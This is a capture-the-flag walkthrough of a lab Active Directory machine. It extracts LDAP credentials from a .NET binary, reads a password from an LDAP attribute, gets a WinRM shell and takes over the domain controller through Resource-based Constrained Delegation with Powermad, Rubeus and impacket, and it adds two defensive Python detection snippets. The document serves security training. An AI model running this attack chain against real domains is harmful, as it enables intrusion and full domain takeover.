Hi everyone! This machine is an Active Directory box where we enumerate an SMB shared folder, use dnSpy to reverse engineer a .NET binary for LDAP credentials, run an LDAP query to find another user's credentials, get initial access via WinRM, and escalate privileges using Kerberos Resource-based Constrained Delegation. Let's get started!
Nmap enumeration
$ IP=10.10.11.174
$ sudo nmap -sC -sV -p- 10.10.11.174
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-02 06:48:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
52169/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -2s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-02T06:49:57
|_ start_date: N/A
SMB enumeration
Readable shared folder
$ smbmap -H $IP -u anonymous
[+] Guest session IP: 10.10.11.174:445 Name: 10.10.11.174
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
support-tools READ ONLY support staff tools
SYSVOL NO ACCESS Logon server share
$ smbclient \\\\$IP\\support-tools
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 884023 blocks available
smb: \> get UserInfo.exe.zip
Since the share lists software together with version numbers, a quick Google search turned up a possible privilege escalation vector in 7-Zip. UserInfo.exe.zip is also interesting: there is no official software called UserInfo, so this binary might contain user credentials.
dnSpy obtaining credentials
While loading the file into IDA Freeware, I noticed that the binary is a .NET assembly, so analyzing it with dnSpy is the better choice.

I decided to check out the LdapQuery class, since during enumeration I found that credentials are required for LDAP queries. As the software performs LDAP queries itself, it might contain hardcoded credentials for them.


I decided to write a Python script to recover the plaintext password.
import base64

# Hardcoded values taken from the binary: the base64 ciphertext and the XOR key
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8")
array = base64.b64decode(enc_password)
array2 = ""
for i in range(len(array)):
    # each byte is XORed with the repeating key and then with the constant 223 (0xDF)
    array2 += chr(array[i] ^ key[i % len(key)] ^ 223)
print(array2)
PS C:\Users\lamecarrot\Desktop> py .\support_htb_crack.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP query
With the newly found credentials, we can do LDAP queries. While searching through the list of users, I noticed an interesting user which is also called support.
$ ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName
...
# requesting: sAMAccountName
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: Administrators
sAMAccountName: Users
sAMAccountName: Guests
...
sAMAccountName: ldap
sAMAccountName: support
sAMAccountName: smith.rosario
sAMAccountName: hernandez.stanley
sAMAccountName: wilson.shelby
sAMAccountName: anderson.damian
sAMAccountName: thomas.raphael
sAMAccountName: levine.leopoldo
sAMAccountName: raven.clifton
sAMAccountName: bardot.mary
sAMAccountName: cromwell.gerard
sAMAccountName: monroe.david
sAMAccountName: west.laura
sAMAccountName: langley.lucy
sAMAccountName: daughtler.mabel
sAMAccountName: stoll.rachelle
sAMAccountName: ford.victoria
sAMAccountName: MANAGEMENT$
I decided to look into the support user's attributes and found an interesting one called "info".
$ ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
...
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
...
Initial access
Winrm
Looking at the open ports, we can see that port 5985 is open, which is WinRM. We can use evil-winrm to log in with the credential we just found.
$ sudo gem install evil-winrm
$ evil-winrm -i $IP -u "support" -p 'Ironside47pleasure40Watchful'
...
*Evil-WinRM* PS C:\Users\support\Documents>
It worked: I was able to log in and obtain a shell.
User.txt
*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir
Directory: C:\Users\support\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/12/2022 9:30 PM 34 user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
7a******************************
*Evil-WinRM* PS C:\Users\support\Desktop>
Privilege escalation
References:
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#impersonation
- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- https://www.hackingarticles.in/domain-escalation-resource-based-constrained-delegation/
Kerberos Resource-based Constrained Delegation
First, we need to download two PowerShell scripts. Copy, paste and execute the commands below on your attacking machine.
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Upload them via evil-winrm and import them as modules.
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
We can check whether ordinary users are allowed to create new computer objects in the domain (the ms-DS-MachineAccountQuota attribute on the domain object). By default, a domain member can add up to 10 computers to the domain.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb

Next, we have to check that the machine is running at least Windows Server 2012.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainController

The victim machine is Windows Server 2022.
Finally, we have to check that the target computer does not already have the msds-allowedtoactonbehalfofotheridentity attribute set.
*Evil-WinRM* PS C:\Users\support\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

Create a new computer object
We can now create a new computer object. Paste the following into PowerShell to create the object, then note its SID.
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer fake01 -Properties objectsid

Let's create a new raw security descriptor for the "fake01" computer principal. Remember to change the SID to the value you just found, as well as the hostname of the target computer passed to Get-DomainComputer.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
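The SDDL string above is the entire statement of whom the DC will now act on behalf of, so a defender auditing msds-allowedtoactonbehalfofotheridentity should be able to read it. As an added example (not from the original post), this Python parser splits an SDDL string into its owner and ACEs and reports any trustee SID granted access that is not on an allow-list of expected front-end hosts; the function names and the allow-list are my own assumptions.

```python
import re

# Two-letter SDDL access-right codes (Windows SDDL syntax); unknown codes are kept raw.
RIGHTS = {
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS", "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
}

# One ACE: (type;flags;rights;object_guid;inherit_guid;trustee)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[^;]*);"
                    r"(?P<objguid>[^;]*);(?P<inhguid>[^;]*);(?P<sid>[^)]+)\)")


def parse_sddl(sddl):
    """Return (owner, aces); each ACE is a dict with its type, rights list and trustee SID."""
    m = re.match(r"O:([A-Z]{2}|S-[0-9-]+)", sddl)
    owner = m.group(1) if m else None
    aces = []
    dacl = sddl.find("D:")
    if dacl != -1:
        for ace in ACE_RE.finditer(sddl, dacl):
            r = ace.group("rights")
            if r.startswith("0x"):                       # numeric access-mask form
                rights = [r]
            else:                                        # concatenated two-letter codes
                rights = [RIGHTS.get(r[i:i + 2], r[i:i + 2]) for i in range(0, len(r), 2)]
            aces.append({"type": ace.group("type"), "rights": rights, "sid": ace.group("sid")})
    return owner, aces


def unexpected_trustees(sddl, expected_sids):
    """SIDs with an allow ACE that are not among the hosts meant to delegate to this computer."""
    _, aces = parse_sddl(sddl)
    return sorted({a["sid"] for a in aces if a["type"] == "A" and a["sid"] not in expected_sids})


if __name__ == "__main__":
    # The descriptor the post writes onto the DC; in an audit you would read the attribute back instead.
    sddl = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
    owner, aces = parse_sddl(sddl)
    print("owner:", owner)
    for a in aces:
        print(a["type"], a["sid"], ",".join(a["rights"]))
    print("unexpected trustees:", unexpected_trustees(sddl, expected_sids=set()))
```

On a DC the attribute should normally be empty, so any SID returned by unexpected_trustees is worth an incident ticket.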
Impersonate to get a ticket
Download Rubeus.exe to your attacking machine.
$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Upload it to the victim machine via evil-winrm and generate the RC4 hash.
*Evil-WinRM* PS C:\Users\support\Desktop> upload Rubeus.exe
*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb
...
[*] Action: Calculate Password Hash(es)
[*] Input password : 123456
[*] Input username : fake01
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBfake01
[*] rc4_hmac : 32ED87BDB5FDC5E9CBA88547376818D4
[*] aes128_cts_hmac_sha1 : 3E1A2E5F7675F6BA5C21FDEABFD92B93
[*] aes256_cts_hmac_sha1 : 37CD1332C1F8DC0C4AA0B738CC971DEBD8D66AED50AF2AF2EC63B7459344B834
[*] des_cbc_md5 : E0795B98AEA1A16B
We can now request a Kerberos ticket for fake01$ while impersonating administrator. Remember to change the RC4 hash, username and domain name to your own values.
*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
...
[*] Action: S4U
[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\fake01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...
[*] Action: S4U
[*] Building S4U2self request for: 'fake01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'fake01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
...
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
...
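From the defender's side, each of the three steps above leaves a Security event on the DC: 4741 when the fake01 account is created, 5136 when msDS-AllowedToActOnBehalfOfOtherIdentity is written on the DC object, and 4769 with a non-empty TransmittedServices field when the S4U2proxy ticket for administrator is issued. As an added example (not part of the original post), this Python correlation runs those three rules over constructed sample events; the allow-lists and the event field names are my assumptions and should be checked against your own log source.

```python
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
PRIVILEGED = {"administrator"}     # impersonating these is always alert-worthy (hypothetical list)
EXPECTED_JOINERS = {"dc$"}         # principals allowed to create machine accounts (hypothetical list)

# Constructed sample events, not real logs. Field names follow the Windows Security event
# XML as I know it (4741 computer account created, 5136 directory service object modified,
# 4769 Kerberos service ticket requested); verify them against your own pipeline.
EVENTS = [
    {"EventID": 4741, "SubjectUserName": "support", "TargetUserName": "FAKE01$"},
    {"EventID": 5136, "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 4769, "TargetUserName": "administrator@SUPPORT.HTB", "ServiceName": "DC$",
     "TransmittedServices": "fake01$@SUPPORT.HTB"},
    {"EventID": 4769, "TargetUserName": "wilson.shelby@SUPPORT.HTB", "ServiceName": "DC$",
     "TransmittedServices": "-"},
]


def detect_rbcd_chain(events):
    """Return (severity, message) alerts for the three steps of an RBCD takeover."""
    alerts = []
    created_by = {}                                    # new machine account -> creator
    for e in events:
        eid = e.get("EventID")
        if eid == 4741:
            creator = e["SubjectUserName"].lower()
            created_by[e["TargetUserName"].lower()] = creator
            if creator not in EXPECTED_JOINERS:
                alerts.append(("medium", f"{e['SubjectUserName']} created machine account {e['TargetUserName']}"))
        elif eid == 5136 and e.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR:
            # Writing this attribute on a domain controller object is never routine.
            sev = "high" if "ou=domain controllers" in e["ObjectDN"].lower() else "medium"
            alerts.append((sev, f"{e['SubjectUserName']} modified {RBCD_ATTR} on {e['ObjectDN']}"))
        elif eid == 4769 and e.get("TransmittedServices", "-") != "-":
            # A non-"-" TransmittedServices means S4U2proxy: a front-end host got a ticket as someone else.
            user = e["TargetUserName"].split("@")[0].lower()
            front_end = e["TransmittedServices"].split("@")[0].lower()
            if user in PRIVILEGED or front_end in created_by:
                alerts.append(("high", f"{front_end} obtained a ticket as {user} for {e['ServiceName']}"))
    return alerts


if __name__ == "__main__":
    for sev, msg in detect_rbcd_chain(EVENTS):
        print(f"[{sev}] {msg}")
```

The corresponding hardening is to set ms-DS-MachineAccountQuota to 0, so that an ordinary user such as support cannot create the front-end account in the first place.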
Since psexec as used in the referenced blog post won't work here (we would be connecting back to the same machine), let's write the ticket to a file on the victim machine instead. Once written, we download it to our attacking machine.
*Evil-WinRM* PS C:\Users\support\Desktop> [IO.File]::WriteAllBytes("C:\Users\support\Documents\ticket.kirbi", [Convert]::FromBase64String("<base64 of the cifs/dc.support.htb ticket printed by Rubeus>"))
*Evil-WinRM* PS C:\Users\support\Desktop> download ticket.kirbi
Make the ticket usable and use it
On Kali, install an older version of impacket (the latest one has issues with some of the tools), klist (krb5-user) and pyasn1. We also need ticket_converter.py. Copy and paste the following on your attacking machine.
wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
pip3 install impacket==0.9.24
pip3 install pyasn1
sudo apt update
sudo apt install krb5-user
Next, destroy any existing tickets on the attacking machine, convert the ticket into a Linux-usable ccache, and point KRB5CCNAME at it.
kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
We must edit our hosts file to map the domain name and hostname to the victim's IP address. The service ticket was issued for the SPN cifs/dc.support.htb, so the tool has to address the host by that name; using the IP address instead will not work.
$ sudo nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.174 dc.support.htb support.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Finally, we can use the ticket to get a shell on the victim machine.
$ impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket v0.9.24 – Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell – Careful what you execute
[!] Press help for extra shell commands
C:>
root.txt
C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of C:\Users\Administrator\Desktop
05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
09/12/2022 09:30 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,884,412,928 bytes free
C:\Users\Administrator\Desktop>type root.txt
f2******************************
C:\Users\Administrator\Desktop>
I hope this has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here.